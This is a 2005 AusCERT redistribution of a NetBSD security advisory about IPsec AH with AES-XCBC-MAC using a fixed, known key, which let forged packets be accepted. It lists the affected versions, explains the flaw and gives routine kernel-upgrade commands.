-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

            ESB-2005.0887 -- NetBSD Security Advisory 2005-007
            AES-XCBC-MAC (IPsec AH) calculated using fixed key
                              8 November 2005

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           IPsec with AH and AES-XCBC-MAC
Publisher:         NetBSD
Operating System:  NetBSD-current (source prior to July 28, 2005)
                   NetBSD 2.0.2
                   NetBSD 2.0
Impact:            Reduced Security
Access:            Remote/Unauthenticated

Original Bulletin: 
ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2005-007.txt.asc

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


		 NetBSD Security Advisory 2005-007
		 =================================

Topic:		AES-XCBC-MAC (IPsec AH) calculated using fixed key

Version:	NetBSD-current:	source prior to July 28, 2005
		NetBSD 2.1:	not affected
		NetBSD 2.0.3:	not affected
		NetBSD 2.0.2:	affected
		NetBSD 2.0:	affected
		NetBSD 1.6.*:	unaffected

Severity:	Affected SAs lack integrity protection so an attacker
		can forge data and have it be wrongly accepted

Fixed:		NetBSD-current:		July 28, 2005
		NetBSD-3 branch:	July 28, 2005
						(3.0 will include the fix)
		NetBSD-2.0 branch:	July 28, 2005 
						(2.0.3 includes the fix)
		NetBSD-2 branch:	July 28, 2005
						(2.1 includes the fix)


Abstract
========

Machines using IPsec [RFC2401] with AH and AES-XCBC-MAC algorithm
[RFC3566] incorrectly used a fixed key instead of the provided one.
Because a known key is used, affected Security Associations lack
integrity and data origin authentication protection, and an attacker
could send forged packets which would be accepted by the receiver.


Technical Details
=================

An error in the implementation of the AES-XCBC-MAC algorithm, used by
IPsec SAs for authentication, did not encrypt r_k1s in
ah_aes_xcbc_mac_init(), and only seeded it with the constant in
k1seed.

r_k1s was later passed as the encryption key to rijndaelEncrypt() by
ah_aes_xcbc_mac_loop() and ah_aes_xcbc_mac_result(), causing them to
use the same encryption key for authentication, without using the
key (set by the admin) passed from userland.

Because of this error, a receiving system using AH with AES-XCBC-MAC
checks an IPsec datagram with a fixed and known key.  An attacker
could create a forged packet with a valid Integrity Check Value,
causing the receiver to accept the packet.  Also, systems with this
bug would not interoperate with systems with the correct key.

If AH with AES-XCBC-MAC is used without confidentiality protection
(e.g. ESP [RFC2406]), an attacker can trivially cause data of his
choice to be received and processed.  With confidentiality protection,
causing particular data to be processed is harder, but note that in
general confidentiality mechanisms do not provide effective integrity
protection.


Solutions and Workarounds
=========================

A workaround is to not use the AES-XCBC-MAC algorithm for authentication,
but it is highly recommended that any users of affected NetBSD versions
upgrade their kernel.

The following instructions describe how to upgrade your kernel by
updating your source tree and rebuilding and installing a new version of
the kernel.

* NetBSD-current:

	Systems running NetBSD-current dated from before 2005-07-28
	should be upgraded to NetBSD-current dated 2005-07-29 or later.
	(Systems built from the netbsd-3 branch should be upgraded to
	2005-07-29 or later.)

	The following files need to be updated from the
	netbsd-current CVS branch (aka HEAD):
		src/sys/netinet6/ah_aesxcbcmac.c

	To update from CVS, re-build, and re-install the kernel:
		# cd src
		# cvs update -d -P sys/netinet6/ah_aesxcbcmac.c
		# ./build.sh kernel=GENERIC
		# mv /netbsd /netbsd.old
		# cp sys/arch/`machine`/compile/obj/GENERIC/netbsd /netbsd
		# shutdown -r now


* NetBSD 2.x:

	Systems built from source along the netbsd-2 or netbsd-2-0 branches
	dated from before 2005-07-28 should be upgraded from sources dated
	2005-07-29 or later. This includes the binary distributions of
	NetBSD 2.0 and NetBSD 2.0.2.

	NetBSD 2.1 includes the fix.

	The following files should be updated from CVS:
		src/sys/netinet6/ah_aesxcbcmac.c

	To update from CVS, verify that your sources are from the correct
	branch, re-build, and re-install the kernel:

		# cd src
		# cvs update -d -P sys/netinet6/ah_aesxcbcmac.c
		# ./build.sh kernel=GENERIC
		# mv /netbsd /netbsd.old
		# cp sys/arch/`machine`/compile/obj/GENERIC/netbsd /netbsd
		# shutdown -r now


* NetBSD 1.6 (and subsequent point releases) do not include
  AES-XCBC-MAC and are thus unaffected.


Thanks To
=========

Yukiyo Akisada for reporting the bug to KAME.
SUZUKI Shinsuike for reporting the bug to NetBSD.
Christos Zoulas for quickly adapting the fix to NetBSD.


Revision History
================

	2005-10-31	Initial release


More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at 
  
ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2005-007.txt.asc

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.org/ and http://www.NetBSD.org/Security/.


Copyright 2005, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2005-007.txt,v 1.8 2005/10/31 06:41:04 gendalia Exp $

- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (NetBSD)

iQCVAwUBQ2fKdD5Ru2/4N2IFAQIEUQQAlpQMrJ1YeDOC4SggrVbxTgwr6HtZzSU6
Rl7F1fQybzN4tcUnYo3m20k57IKLr94SDOUI5rrL9O0qU8Oz/V7V8hI48Z82HXk9
gk2yFnWgeTYOOttSPXkEU7/ohDKibQXK6+1JTG3L3NTAAmphTBai0nxii0iNN9Vk
wdIxN4YcaqA=
=GnoS
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your computer system has been compromised or attacked in 
any way, we encourage you to let us know by completing the secure National IT 
Incident Reporting Form at:

        http://www.auscert.org.au/render.html?it=3192

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBQ2/0gyh9+71yA2DNAQKduwP+O+6af9PVnQIFX89a1RtRdK1HYtdJUT8v
dAdY0YD15BPTDK5+foDiwStbbhPwL/LlwtJjqdvJ9NYb76jQk0Cq+zTfdJUgp5iQ
87SU9wdaxOnxmzm1HQS66sHYeIFbLN5iNm9nyjTW95Iu+6t4uW8wzZpRYrM9HDZq
UhuSJ009pcg=
=OPgw
-----END PGP SIGNATURE-----